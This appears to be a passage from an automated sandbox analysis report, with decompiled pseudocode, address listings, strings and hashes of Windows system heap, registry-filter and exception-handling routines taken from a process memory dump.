								if( *((intOrPtr*)(_t300 + 0x4c)) != 0) {
									_t291 =  *(_t300 + 0x50) ^  *_t232;
									 *_t232 = _t291;
									_t264 = _t291 >> 0x00000010 ^ _t291 >> 0x00000008 ^ _t291;
									if(_t291 >> 0x18 != _t264) {
										_push(_t264);
										E04D6D646(_t232, _t300, _t232, _t298, _t300, __eflags);
									}
								}
								 *((char*)(_t232 + 2)) = 0;
								 *((char*)(_t232 + 7)) = 0;
								_t148 =  *((intOrPtr*)(_t298 + 8));
								_t242 =  *((intOrPtr*)(_t298 + 0xc));
								_t277 =  *((intOrPtr*)(_t148 + 4));
								_v32 = _t277;
								_t38 = _t298 + 8; // 0x8
								_t278 = _t38;
								if( *_t242 != _t277 ||  *_t242 != _t278) {
									E04D75FED(0xd, 0, _t278, _v32,  *_t242, 0);
								} else {
									 *_t242 = _t148;
									 *((intOrPtr*)(_t148 + 4)) = _t242;
								}
								_t150 =  *(_t298 + 0x14);
								if(_t150 == 0) {
									L27:
									_t244 = _v12;
									 *((intOrPtr*)(_t244 + 0x30)) =  *((intOrPtr*)(_t244 + 0x30)) - 1;
									 *((intOrPtr*)(_t244 + 0x2c)) =  *((intOrPtr*)(_t244 + 0x2c)) - ( *(_t298 + 0x14) >> 0xc);
									 *((intOrPtr*)(_t300 + 0x1f8)) =  *((intOrPtr*)(_t300 + 0x1f8)) +  *(_t298 + 0x14);
									 *((intOrPtr*)(_t300 + 0x20c)) =  *((intOrPtr*)(_t300 + 0x20c)) + 1;
									 *((intOrPtr*)(_t300 + 0x208)) =  *((intOrPtr*)(_t300 + 0x208)) - 1;
									_t245 =  *(_t298 + 0x14);
									if(_t245 >= 0x7f000) {
										 *((intOrPtr*)(_t300 + 0x1fc)) =  *((intOrPtr*)(_t300 + 0x1fc)) - _t245;
										_t245 =  *(_t298 + 0x14);
									}
									_t280 = _v8;
									_t154 =  *_v8;
									if(_t245 <=  *_v8) {
										_t281 = _v12;
										__eflags =  *((intOrPtr*)(_t298 + 0x10)) + _t245 -  *((intOrPtr*)(_t281 + 0x28));
										_t280 = _v8;
										if( *((intOrPtr*)(_t298 + 0x10)) + _t245 !=  *((intOrPtr*)(_t281 + 0x28))) {
											 *_t280 =  *_t280 + ( *_t232 & 0x0000ffff) * 8;
											goto L30;
										}
										_t154 =  *_t280;
										goto L29;
									} else {
										L29:
										E04CC096B(_t300, _v12,  *((intOrPtr*)(_t298 + 0x10)) + 0xffffffe8 +  *_t280, _t245 - _t154, _t232, _t280);
										 *_v8 =  *_v8 << 3;
										L30:
										_t247 = _v12;
										 *((char*)(_t232 + 3)) = 0;
										_t282 =  *((intOrPtr*)(_t247 + 0x18));
										if( *((intOrPtr*)(_t247 + 0x18)) != _t247) {
											_t162 = (_t232 - _t247 >> 0x10) + 1;
											_v32 = _t162;
											__eflags = _t162 - 0xfe;
											if(_t162 >= 0xfe) {
												E04D75FED(3, _t282, _t232, _t247, 0, 0);
												_t162 = _v32;
											}
										} else {
											_t162 = 0;
										}
										 *((char*)(_t232 + 6)) = _t162;
										_t164 =  *( *[fs:0x30] + 0x50);
										if(_t164 != 0) {
											__eflags =  *_t164;
											if( *_t164 == 0) {
												goto L33;
											}
											_t165 =  &(( *( *[fs:0x30] + 0x50))[0x89]);
											L34:
											if( *_t165 != 0) {
												_t166 =  *[fs:0x30];
												__eflags =  *(_t166 + 0x240) & 0x00000001;
												if(( *(_t166 + 0x240) & 0x00000001) == 0) {
													goto L35;
												}
												__eflags = E04CC3C40();
												if(__eflags == 0) {
													_t180 = 0x7ffe0380;
												} else {
													_t180 =  &(( *( *[fs:0x30] + 0x50))[0x89]);
												}
												_t299 = _v8;
												E04D6F1C3(_t232, _t300, _t232, __eflags,  *_v8,  *(_t300 + 0x74) << 3,  *_t180 & 0x000000ff);
												L36:
												_t168 =  *( *[fs:0x30] + 0x50);
												if(_t168 != 0) {
													__eflags =  *_t168;
													if( *_t168 == 0) {
														goto L37;
													}
													_t169 =  &(( *( *[fs:0x30] + 0x50))[0x8c]);
													L38:
													if( *_t169 != 0) {
														__eflags = E04CC3C40();
														if(__eflags == 0) {
															_t171 = 0x7ffe038a;
														} else {
															_t171 =  &(( *( *[fs:0x30] + 0x50))[0x8c]);
														}
														E04D6F1C3(_t232, _t300, _t232, __eflags,  *_t299,  *(_t300 + 0x74) << 3,  *_t171 & 0x000000ff);
													}
													return _t232;
												}
												L37:
												_t169 = 0x7ffe038a;
												goto L38;
											}
											L35:
											_t299 = _v8;
											goto L36;
										}
										L33:
										_t165 = 0x7ffe0380;
										goto L34;
									}
								} else {
									_t287 =  *(_t300 + 0xb8);
									if(_t287 != 0) {
										_t256 = _t150 >> 0xc;
										__eflags = _t256 - _t287[1];
										if(_t256 < _t287[1]) {
											L79:
											E04CC036A(_t300, _t287, 0, _t298, _t256, _t150);
											goto L24;
										} else {
											goto L75;
										}
										while(1) {
											L75:
											_t197 =  *_t287;
											__eflags = _t197;
											_v32 = _t197;
											_t150 =  *(_t298 + 0x14);
											if(_t197 == 0) {
												break;
											}
											_t287 = _v32;
											__eflags = _t256 - _t287[1];
											if(_t256 >= _t287[1]) {
												continue;
											}
											goto L79;
										}
										_t256 = _t287[1] - 1;
										__eflags = _t287[1] - 1;
										goto L79;
									}
									L24:
									_t258 =  *((intOrPtr*)(_t298 + 4));
									_t195 =  *_t298;
									_t288 =  *_t258;
									if(_t288 !=  *((intOrPtr*)(_t195 + 4)) || _t288 != _t298) {
										E04D75FED(0xd, 0, _t298,  *((intOrPtr*)(_t195 + 4)), _t288, 0);
									} else {
										 *_t258 = _t195;
										 *((intOrPtr*)(_t195 + 4)) = _t258;
									}
									goto L27;
								}
							}
							L15:
							_t146 = 0x7ffe0380;
							goto L16;
						}
						_t271 =  *_t215;
						if(_t271 != 0) {
							L63:
							_t101 = _t298 - 8; // -8
							_t232 = _t101;
							__eflags = _v28 +  *_t276 - _t271;
							if(__eflags <= 0) {
								goto L11;
							}
							_t220 =  *(_v24 + 4);
							__eflags =  *(_v24 + 4);
							if(__eflags != 0) {
								E04D75FED(0x15, _t300, 0, _t220, _v32, _v28);
								_t276 = _v8;
							}
							_t143 = 0xc000012d;
							goto L12;
						}
						_t271 =  *0x4da432c; // 0x0
						_v24 = 0x4da432c;
						if(_t271 != 0) {
							goto L63;
						}
						goto L11;
					}
				}
			}

0x04cc0689
0x04cc068d
0x04cc0690
0x04cc0699
0x04cc06a3
0x04cc0929
0x00000000
0x04cc0929
0x04cc06b0
0x04d14e97
0x04d14e99
0x04d14e9f
0x04d14ea5
0x04d14ea9
0x04d14eca
0x04d14ecf
0x04d14eab
0x04d14ec0
0x04d14ec5
0x04d14ed7
0x04d14edc
0x04d14ee4
0x04d14eeb
0x04d14ef6
0x04d14ef6
0x04d14eeb
0x04d14e99
0x04cc06b6
0x04cc06b9
0x04cc06b9
0x04cc06be
0x04cc0921
0x04cc06c4
0x04cc06c4
0x04cc06c4
0x04cc06ca
0x04cc06d3
0x04cc06d9
0x04cc06dc
0x04d14f0a
0x04d14f10
0x04d14f13
0x00000000
0x04cc06e2
0x04cc06e2
0x04cc06f2
0x04cc0930
0x04cc0936
0x04cc0938
0x04cc093e
0x04cc093e
0x04cc0938
0x04cc06ff
0x04d14f1b
0x04d14f1d
0x04d14f22
0x04d14f29
0x04d14f2a
0x04d14f2c
0x04d14f2d
0x04d14f2f
0x04d14f34
0x04d14f36
0x04d14f39
0x04d14f44
0x04d14f4d
0x04d14f4f
0x04d14f54
0x04d14f5b
0x04d14f5b
0x00000000
0x04d14f5b
0x04d14f3b
0x04d14f3d
0x00000000
0x00000000
0x04d14f3f
0x04d14f42
0x00000000
0x00000000
0x00000000
0x04cc0705
0x04cc0705
0x04cc070c
0x04cc070e
0x04cc0724
0x04cc0727
0x04cc072d
0x04cc0730
0x04cc0751
0x04cc0751
0x04cc0757
0x04cc075c
0x04cc075d
0x04cc075f
0x04cc0760
0x04cc0762
0x04cc0767
0x04cc076a
0x04cc076a
0x04cc0770
0x04cc0772
0x04d14f9f
0x00000000
0x04d14f9f
0x04cc077e
0x04cc0783
0x04d14faa
0x04d14fad
0x00000000
0x00000000
0x04d14fbc
0x04cc078e
0x04cc0791
0x04d14fcc
0x04d14fd3
0x04d14fe2
0x04d14fe2
0x04d14fd3
0x04cc079b
0x04cc07a0
0x04cc07a4
0x04cc07b0
0x04cc07b7
0x04d14fec
0x04d14ff1
0x04d14ff1
0x04cc07b7
0x04cc07bd
0x04cc07c1
0x04cc07c5
0x04cc07c8
0x04cc07cb
0x04cc07d0
0x04cc07d3
0x04cc07d3
0x04cc07d6
0x04d15008
0x04cc07e4
0x04cc07e4
0x04cc07e6
0x04cc07e6
0x04cc07e9
0x04cc07ee
0x04cc081b
0x04cc081b
0x04cc081e
0x04cc0827
0x04cc082d
0x04cc0833
0x04cc0839
0x04cc083f
0x04cc0848
0x04cc08fd
0x04cc0903
0x04cc0903
0x04cc084e
0x04cc0851
0x04cc0855
0x04cc0945
0x04cc094d
0x04cc0950
0x04cc0953
0x04cc0964
0x00000000
0x04cc0964
0x04cc0955
0x00000000
0x04cc085b
0x04cc085b
0x04cc086e
0x04cc0876
0x04cc0879
0x04cc0879
0x04cc087c
0x04cc0880
0x04cc0885
0x04cc08dd
0x04cc08de
0x04cc08e1
0x04cc08e6
0x04cc08f3
0x04cc08f8
0x04cc08f8
0x04cc0887
0x04cc0887
0x04cc0887
0x04cc0889
0x04cc0892
0x04cc0897
0x04d1505d
0x04d15060
0x00000000
0x00000000
0x04d1506f
0x04cc08a2
0x04cc08a5
0x04d15079
0x04d1507f
0x04d15086
0x00000000
0x00000000
0x04d15091
0x04d15093
0x04d150a5
0x04d15095
0x04d1509e
0x04d1509e
0x04d150af
0x04d150be
0x04cc08ae
0x04cc08b4
0x04cc08b9
0x04d150c8
0x04d150cb
0x00000000
0x00000000
0x04d150da
0x04cc08c4
0x04cc08c7
0x04d150e9
0x04d150eb
0x04d150fd
0x04d150ed
0x04d150f6
0x04d150f6
0x04d15113
0x04d15113
0x00000000
0x04cc08cd
0x04cc08bf
0x04cc08bf
0x00000000
0x04cc08bf
0x04cc08ab
0x04cc08ab
0x00000000
0x04cc08ab
0x04cc089d
0x04cc089d
0x00000000
0x04cc089d
0x04cc07f0
0x04cc07f0
0x04cc07f8
0x04d15014
0x04d15017
0x04d1501a
0x04d15036
0x04d1503d
0x00000000
0x00000000
0x00000000
0x00000000
0x04d1501c
0x04d1501c
0x04d1501c
0x04d1501e
0x04d15020
0x04d15023
0x04d15026
0x00000000
0x00000000
0x04d15028
0x04d1502b
0x04d1502e
0x00000000
0x00000000
0x00000000
0x04d15030
0x04d15035
0x04d15035
0x00000000
0x04d15035
0x04cc07fe
0x04cc07fe
0x04cc0801
0x04cc0803
0x04cc0808
0x04d15053
0x04cc0816
0x04cc0816
0x04cc0818
0x04cc0818
0x00000000
0x04cc0808
0x04cc07ee
0x04cc0789
0x04cc0789
0x00000000
0x04cc0789
0x04cc0732
0x04cc0736
0x04d14f63
0x04d14f66
0x04d14f66
0x04d14f6b
0x04d14f6d
0x00000000
0x00000000
0x04d14f76
0x04d14f79
0x04d14f7b
0x04d14f8d
0x04d14f92
0x04d14f92
0x04d14f95
0x00000000
0x04d14f95
0x04cc073c
0x04cc0742
0x04cc074b
0x00000000
0x00000000
0x00000000
0x04cc074b
0x04cc06ff

Strings

(UCRBlock->Size >= *Size), xrefs: 04D14ED7
HEAP: , xrefs: 04D14ECA
HEAP[%wZ]: , xrefs: 04D14EBB

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
API String ID: 0-4253913091
Opcode ID: 4ec38780da444912b6679180fe97e5aca718d9f4297013a40f273ef0e75334fd
Instruction ID: 9f3b3311eddcf7b5e4e4480aff48c1045199ba71bfabcdf736d316e09d3c0423
Opcode Fuzzy Hash: 4ec38780da444912b6679180fe97e5aca718d9f4297013a40f273ef0e75334fd
Instruction Fuzzy Hash: A1F18C70B00605EFEB15CFA9D894B6AB7B6FF44304F1481A9E8169B391E734F981CB90

Uniqueness

Uniqueness Score: -1.00%

Function 04CAA147 Relevance: 4.0, Strings: 3, Instructions: 238
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E04CAA147(signed int* __ecx, char* __edx, signed int _a4) {
				signed int _v12;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				char _v560;
				signed int _v564;
				intOrPtr _v568;
				char _v572;
				intOrPtr _v576;
				short _v578;
				char _v580;
				signed int _v584;
				intOrPtr _v586;
				char _v588;
				char* _v592;
				intOrPtr _v596;
				intOrPtr _v600;
				char* _v604;
				signed int* _v608;
				intOrPtr _v612;
				short _v614;
				char _v616;
				signed int _v620;
				signed int _v624;
				intOrPtr _v628;
				char* _v632;
				signed int _v636;
				char _v640;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t94;
				char _t96;
				char* _t101;
				intOrPtr _t120;
				void* _t121;
				intOrPtr _t125;
				short _t129;
				signed int* _t140;
				intOrPtr _t141;
				intOrPtr _t146;
				intOrPtr _t148;
				intOrPtr _t151;
				signed int _t153;
				signed int _t154;
				void* _t155;
				signed int _t157;

				_t152 = __edx;
				_v12 =  *0x4dab370 ^ _t157;
				_v564 = _v564 & 0x00000000;
				_t154 = _a4;
				_t140 = __ecx;
				_v604 = __edx;
				_v608 = __ecx;
				_t153 = 0;
				_v568 = 0x220;
				_v592 =  &_v560;
				if(E04CD1D10( &_v580, L"UseFilter") < 0) {
					L4:
					return E04CF4B50(_t90, _t140, _v12 ^ _t157, _t152, _t153, _t154);
				}
				_push( &_v572);
				_push(0x220);
				_push( &_v560);
				_t94 = 2;
				_push(_t94);
				_push( &_v580);
				_push( *_t140);
				_t90 = E04CF2B00();
				if(_t90 >= 0) {
					if(_v556 != 4 || _v552 != 4 || _v548 == 0) {
						L3:
						_t90 = 0;
					} else {
						_t96 =  *_t154;
						_t154 =  *(_t154 + 4);
						_v588 = _t96;
						_v584 = _t154;
						if(E04CD1D10( &_v580, L"\\??\\") < 0) {
							goto L4;
						}
						if(E04CE40F0( &_v560,  &_v580,  &_v588, 1) != 0) {
							_v588 = _v588 + 0xfff8;
							_v586 = _v586 + 0xfff8;
							_v584 = _t154 + 8;
						}
						_t101 =  &_v560;
						_t146 = 0;
						_v596 = _t101;
						_v600 = 0;
						do {
							_t152 =  &_v572;
							_push( &_v572);
							_push(_v568);
							_push(_t101);
							_push(0);
							_push(_t146);
							_push( *_t140);
							_t154 = E04CF2CD0();
							if(_t154 < 0) {
								goto L37;
							}
							_t148 = _v596;
							_v580 =  *((intOrPtr*)(_t148 + 0xc));
							_v624 = _v624 & 0x00000000;
							_v620 = _v620 & 0x00000000;
							_v578 =  *((intOrPtr*)(_t148 + 0xc));
							_v576 = _t148 + 0x10;
							_v636 =  *_t140;
							_v632 =  &_v580;
							_push( &_v640);
							_push(_v604);
							_v640 = 0x18;
							_push( &_v564);
							_v628 = 0x240;
							_t154 = E04CF2AB0();
							if(_t154 < 0) {
								goto L37;
							}
							_t154 = E04CD1D10( &_v580, L"FilterFullPath");
							if(_t154 < 0) {
								L36:
								_push(_v564);
								E04CF2A80();
								goto L37;
							}
							_t141 = _v592;
							_t120 = _v568;
							do {
								_push( &_v572);
								_push(_t120);
								_push(_t141);
								_t121 = 2;
								_push(_t121);
								_push( &_v580);
								_push(_v564);
								_t155 = E04CF2B00();
								if(_t155 == 0x80000005 || _t155 == 0xc0000023) {
									if(_t153 != 0) {
										E04CC3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t153);
									}
									_t150 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
									if( *((intOrPtr*)( *[fs:0x30] + 0x18)) != 0) {
										_t125 =  *0x4da5d78; // 0x0
										_t153 = E04CC5D90(_t150, _t150, _t125 + 0x180000, _v572);
										if(_t153 == 0) {
											goto L25;
										}
										_t120 = _v572;
										_t141 = _t153;
										_v596 = _t153;
										_v568 = _t120;
										goto L27;
									} else {
										_t153 = 0;
										L25:
										_t154 = 0xc0000017;
										goto L26;
									}
								} else {
									L26:
									_t120 = _v568;
								}
								L27:
							} while (_t154 == 0x80000005 || _t154 == 0xc0000023);
							_v592 = _t141;
							_t140 = _v608;
							if(_t154 >= 0) {
								_t151 = _v592;
								if( *((intOrPtr*)(_t151 + 4)) == 1 &&  *((intOrPtr*)(_t151 + 8)) <= 0xfffe) {
									_t152 = 2;
									_t129 =  *((intOrPtr*)(_t151 + 8)) - _t152;
									_v616 = _t129;
									_v614 = _t129;
									_v612 = _t151 + 0xc;
									if(E04CD04C0( &_v588,  &_v616, 1) == 0) {
										break;
									}
								}
								goto L36;
							}
							_push(_v564);
							E04CF2A80();
							_t65 = _t154 + 0x3fffffcc; // 0x3fffffcc
							asm("sbb eax, eax");
							_t154 = _t154 &  ~_t65;
							L37:
							_t101 = _v596;
							_t146 = _v600 + 1;
							_v600 = _t146;
						} while (_t154 >= 0);
						if(_t153 != 0) {
							E04CC3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t153);
						}
						if(_t154 >= 0) {
							_push( *_t140);
							E04CF2A80();
							 *_t140 = _v564;
						}
						_t86 = _t154 + 0x7fffffe6; // 0x7fffffe6
						asm("sbb eax, eax");
						_t90 =  ~_t86 & _t154;
					}
					goto L4;
				}
				if(_t90 != 0xc0000034) {
					if(_t90 == 0xc0000023) {
						goto L3;
					}
					if(_t90 != 0x80000005) {
						goto L4;
					}
				}
				goto L3;
			}

0x04caa147
0x04caa159
0x04caa15c
0x04caa16b
0x04caa16e
0x04caa17c
0x04caa183
0x04caa189
0x04caa18b
0x04caa195
0x04caa1a2
0x04caa1de
0x04caa1ec
0x04caa1ec
0x04caa1aa
0x04caa1ab
0x04caa1b6
0x04caa1b9
0x04caa1ba
0x04caa1c1
0x04caa1c2
0x04caa1c4
0x04caa1cb
0x04d0bf43
0x04caa1dc
0x04caa1dc
0x04d0bf62
0x04d0bf62
0x04d0bf64
0x04d0bf67
0x04d0bf79
0x04d0bf86
0x00000000
0x00000000
0x04d0bfa3
0x04d0bfaa
0x04d0bfb1
0x04d0bfbb
0x04d0bfbb
0x04d0bfc1
0x04d0bfc7
0x04d0bfc9
0x04d0bfcf
0x04d0bfd5
0x04d0bfd5
0x04d0bfdb
0x04d0bfdc
0x04d0bfe2
0x04d0bfe3
0x04d0bfe5
0x04d0bfe6
0x04d0bfed
0x04d0bff1
0x00000000
0x00000000
0x04d0bff7
0x04d0c001
0x04d0c00c
0x04d0c013
0x04d0c01a
0x04d0c024
0x04d0c02c
0x04d0c038
0x04d0c044
0x04d0c045
0x04d0c051
0x04d0c05b
0x04d0c05c
0x04d0c06b
0x04d0c06f
0x00000000
0x00000000
0x04d0c086
0x04d0c08a
0x04d0c1ba
0x04d0c1ba
0x04d0c1c0
0x00000000
0x04d0c1c0
0x04d0c090
0x04d0c096
0x04d0c09c
0x04d0c0a2
0x04d0c0a3
0x04d0c0a4
0x04d0c0a7
0x04d0c0a8
0x04d0c0af
0x04d0c0b0
0x04d0c0bb
0x04d0c0c3
0x04d0c0cf
0x04d0c0dd
0x04d0c0dd
0x04d0c0e8
0x04d0c0ed
0x04d0c138
0x04d0c14f
0x04d0c153
0x00000000
0x00000000
0x04d0c155
0x04d0c15b
0x04d0c15d
0x04d0c163
0x00000000
0x04d0c0ef
0x04d0c0ef
0x04d0c0f1
0x04d0c0f1
0x00000000
0x04d0c0f1
0x04d0c0f6
0x04d0c0f6
0x04d0c0f6
0x04d0c0f6
0x04d0c0fc
0x04d0c0fc
0x04d0c10c
0x04d0c112
0x04d0c11a
0x04d0c16b
0x04d0c175
0x04d0c186
0x04d0c187
0x04d0c18a
0x04d0c191
0x04d0c19b
0x04d0c1b8
0x00000000
0x00000000
0x04d0c1b8
0x00000000
0x04d0c175
0x04d0c11c
0x04d0c122
0x04d0c127
0x04d0c12f
0x04d0c131
0x04d0c1c5
0x04d0c1cb
0x04d0c1d1
0x04d0c1d2
0x04d0c1d8
0x04d0c1e2
0x04d0c1f0
0x04d0c1f0
0x04d0c1f7
0x04d0c1f9
0x04d0c1fb
0x04d0c206
0x04d0c206
0x04d0c208
0x04d0c210
0x04d0c212
0x04d0c212
0x00000000
0x04d0bf43
0x04caa1d6
0x04d0bf26
0x00000000
0x00000000
0x04d0bf31
0x00000000
0x00000000
0x04d0bf37
0x00000000

Strings

UseFilter, xrefs: 04CAA171
\??\, xrefs: 04D0BF73
FilterFullPath, xrefs: 04D0C075

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID: InitializeThunk
String ID: FilterFullPath$UseFilter$\??\
API String ID: 2994545307-2779062949
Opcode ID: 81e0dd3dbe16945bf46a2501a893e2b5f935a968f7ed24399bfa864ac3e72fda
Instruction ID: ea69c7a298331f4f06f7f84fa35b21c57230084918706bf421a4f19a12167466
Opcode Fuzzy Hash: 81e0dd3dbe16945bf46a2501a893e2b5f935a968f7ed24399bfa864ac3e72fda
Instruction Fuzzy Hash: 4EA18E319112299BDF31DF64CC88BAAB7B9EF04714F1041EAEA09A7250D735AEC5DF50

Uniqueness

Uniqueness Score: -1.00%

Function 04CE8FBC Relevance: 3.9, Strings: 3, Instructions: 199
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E04CE8FBC(intOrPtr* _a4, intOrPtr _a8) {
				signed int _v8;
				void* _v16;
				intOrPtr _v84;
				char _v92;
				signed char _v96;
				signed char _v100;
				signed char _v104;
				char _v108;
				char _v112;
				signed int _v116;
				signed char _v120;
				intOrPtr _v124;
				char _v125;
				intOrPtr _v128;
				void* _v132;
				void* _v133;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t90;
				signed int _t91;
				signed char _t94;
				intOrPtr _t103;
				signed int _t104;
				signed char _t109;
				void* _t120;
				char* _t127;
				signed char _t128;
				intOrPtr _t129;
				signed char _t131;
				signed char _t144;
				void* _t148;
				intOrPtr _t149;
				void* _t150;
				signed char _t152;
				intOrPtr* _t155;
				void* _t156;
				signed int _t157;
				signed int _t159;

				_t159 = (_t157 & 0xfffffff8) - 0x7c;
				_t87 =  *0x4dab370 ^ _t159;
				_v8 =  *0x4dab370 ^ _t159;
				_t139 = _a8;
				_t155 = _a4;
				_t119 = 0;
				_push(_t148);
				_v124 = _a8;
				_v125 = 0;
				if( *_t155 == 0xc0000006 || E04CE931B(_t87,  *((intOrPtr*)(_t155 + 0xc))) == 0) {
					if(( *( *[fs:0x30] + 0x68) & 0x00800000) != 0) {
						_v125 = 1;
						E04D68BBD(_t155, _t139);
					}
					_t90 = E04CD0130();
					_t149 = _v124;
					if(_t90 != 0) {
						_t91 = E04CE9325(_t119,  *((intOrPtr*)(_t149 + 0xc4)), _t149, _t155, __eflags);
						__eflags = _t91;
						if(_t91 != 0) {
							goto L4;
						} else {
							_t131 = 0xd;
							asm("int 0x29");
							goto L25;
						}
					} else {
						L4:
						if(E04CECCD1(_t155, _t149, _t119) != 0) {
							L20:
							_t119 = 1;
							L21:
							_t139 = _v124;
							E04CECCD1(_t155, _v124, 1);
							_t94 = _t119;
							goto L22;
						}
						_t127 =  &_v112;
						E04CE92EF(_t127,  &_v108);
						_t151 =  *[fs:0x0];
						_push(_t119);
						_push(4);
						_push( &_v116);
						_push(0x22);
						_push(0xffffffff);
						_v120 =  *[fs:0x0];
						_v116 = _t119;
						if(E04CF2B20() < 0) {
							_v116 = _t119;
						}
						if((_v116 & 0x00000040) != 0) {
							L8:
							_t128 = _v120;
							_v104 = _t119;
							L9:
							if(_t128 == 0xffffffff) {
								goto L21;
							}
							if(_t128 < _v112 || _t128 + 8 > _v108 || (_t128 & 0x00000003) != 0) {
								L29:
								 *(_t155 + 4) =  *(_t155 + 4) | 0x00000008;
								goto L21;
							} else {
								_t129 =  *((intOrPtr*)(_t128 + 4));
								if(_t129 < _v108) {
									__eflags = _v112 - _t129;
									if(_v112 > _t129) {
										goto L14;
									}
									goto L29;
								}
								L14:
								if(E04CE9193(_t129, _v116, _v124) == 0) {
									goto L29;
								}
								_t152 = _v120;
								_v100 = _t119;
								if(_v125 != _t119) {
									_v108 = E04D68C65(_t155, _v124, _t129,  *((intOrPtr*)(_t152 + 4)));
								}
								_t103 = E04D08860(_t155, _t152, _v124,  &_v96,  *((intOrPtr*)(_t152 + 4)));
								_t131 = _v120;
								if(_t131 != 0) {
									 *((intOrPtr*)(_t131 + 0x320)) = _t103;
								}
								_t144 = _v104;
								if(_t144 == _t152) {
									 *(_t155 + 4) =  *(_t155 + 4) & 0xffffffef;
									_t144 = _t119;
									_v104 = _t144;
								}
								_t91 = _t103 - _t119;
								if(_t91 != 0) {
									L25:
									_t104 = _t91 - 1;
									__eflags = _t104;
									if(_t104 != 0) {
										__eflags = _t104 == 1;
										if(_t104 == 1) {
											 *(_t155 + 4) =  *(_t155 + 4) | 0x00000010;
											__eflags = _v96 - _t144;
											if(_v96 > _t144) {
												_v104 = _v96;
											}
										} else {
											_v92 = 0xc0000026;
											_push( &_v92);
											 *((intOrPtr*)(_t159 + 0x38)) = 1;
											_v84 = _t155;
											 *(_t159 + 0x44) = _t119;
											L04D08A60(_t131, _t144);
										}
										goto L27;
									}
									goto L26;
								} else {
									_t109 = _t91 + 1;
									if(( *(_t155 + 4) & _t109) != 0) {
										 *(_t159 + 0x34) = _t109;
										_push( &_v92);
										_v92 = 0xc0000025;
										_v84 = _t155;
										 *(_t159 + 0x44) = _t119;
										L04D08A60(_t131, _t144);
										L26:
										__eflags =  *(_t155 + 4) & 0x00000008;
										if(( *(_t155 + 4) & 0x00000008) != 0) {
											goto L21;
										}
										L27:
										_t128 =  *_v120;
										_v120 = _t128;
										goto L9;
									}
									goto L20;
								}
							}
						} else {
							_push(_t127);
							if(E04CE9284(_t151, _v112, _v108) == 0) {
								 *(_t155 + 4) =  *(_t155 + 4) | 0x00000008;
								__eflags =  *0x4da38bc - 2;
								if( *0x4da38bc != 2) {
									goto L21;
								}
								asm("lock cmpxchg [edx], ecx");
								__eflags = 0;
								if(0 == 0) {
									E04D667F9(_t119, _t155, _v128, 0);
								}
								 *(_t155 + 4) =  *(_t155 + 4) & 0xfffffff7;
							}
							goto L8;
						}
					}
				} else {
					E04D63A55(0,  *((intOrPtr*)(_t139 + 0xac)), _t139, _t148);
					 *((intOrPtr*)(_v124 + 0xb8)) = E04D667F3();
					_t94 = 1;
					L22:
					_pop(_t150);
					_pop(_t156);
					_pop(_t120);
					return E04CF4B50(_t94, _t120, _v8 ^ _t159, _t139, _t150, _t156);
				}
			}

0x04ce8fc4
0x04ce8fcc
0x04ce8fce
0x04ce8fd2
0x04ce8fd7
0x04ce8fda
0x04ce8fdc
0x04ce8fdd
0x04ce8fe1
0x04ce8feb
0x04ce900a
0x04d25a79
0x04d25a7e
0x04d25a7e
0x04ce9010
0x04ce9015
0x04ce901b
0x04ce9153
0x04ce9158
0x04ce915a
0x00000000
0x04ce9160
0x04ce9162
0x04ce9163
0x00000000
0x04ce9163
0x04ce9021
0x04ce9021
0x04ce902d
0x04ce9125
0x04ce9125
0x04ce9127
0x04ce9127
0x04ce912f
0x04ce9134
0x00000000
0x04ce9134
0x04ce9037
0x04ce903b
0x04ce9040
0x04ce904b
0x04ce904c
0x04ce904e
0x04ce904f
0x04ce9051
0x04ce9053
0x04ce9057
0x04ce9062
0x04d25a88
0x04d25a88
0x04ce906d
0x04ce9087
0x04ce9087
0x04ce908b
0x04ce908f
0x04ce9092
0x00000000
0x00000000
0x04ce909c
0x04ce918d
0x04ce918d
0x00000000
0x04ce90b8
0x04ce90b8
0x04ce90bf
0x04ce9183
0x04ce9187
0x00000000
0x00000000
0x00000000
0x04ce9187
0x04ce90c5
0x04ce90d4
0x00000000
0x00000000
0x04ce90da
0x04ce90de
0x04ce90e6
0x04d25ad7
0x04d25ad7
0x04ce90fa
0x04ce90ff
0x04ce9105
0x04d25ae0
0x04d25ae0
0x04ce910b
0x04ce9111
0x04d25aeb
0x04d25aef
0x04d25af1
0x04d25af1
0x04ce9117
0x04ce9119
0x04ce9165
0x04ce9165
0x04ce9165
0x04ce9168
0x04d25afa
0x04d25afd
0x04d25b26
0x04d25b2a
0x04d25b2e
0x04d25b38
0x04d25b38
0x04d25aff
0x04d25b03
0x04d25b0b
0x04d25b0c
0x04d25b14
0x04d25b18
0x04d25b1c
0x04d25b1c
0x00000000
0x04d25afd
0x00000000
0x04ce911b
0x04ce911b
0x04ce911f
0x04d25b41
0x04d25b49
0x04d25b4a
0x04d25b52
0x04d25b56
0x04d25b5a
0x04ce916e
0x04ce916e
0x04ce9172
0x00000000
0x00000000
0x04ce9174
0x04ce9178
0x04ce917a
0x00000000
0x04ce917a
0x00000000
0x04ce911f
0x04ce9119
0x04ce906f
0x04ce9073
0x04ce9081
0x04d25a91
0x04d25a95
0x04d25a9c
0x00000000
0x00000000
0x04d25aac
0x04d25ab0
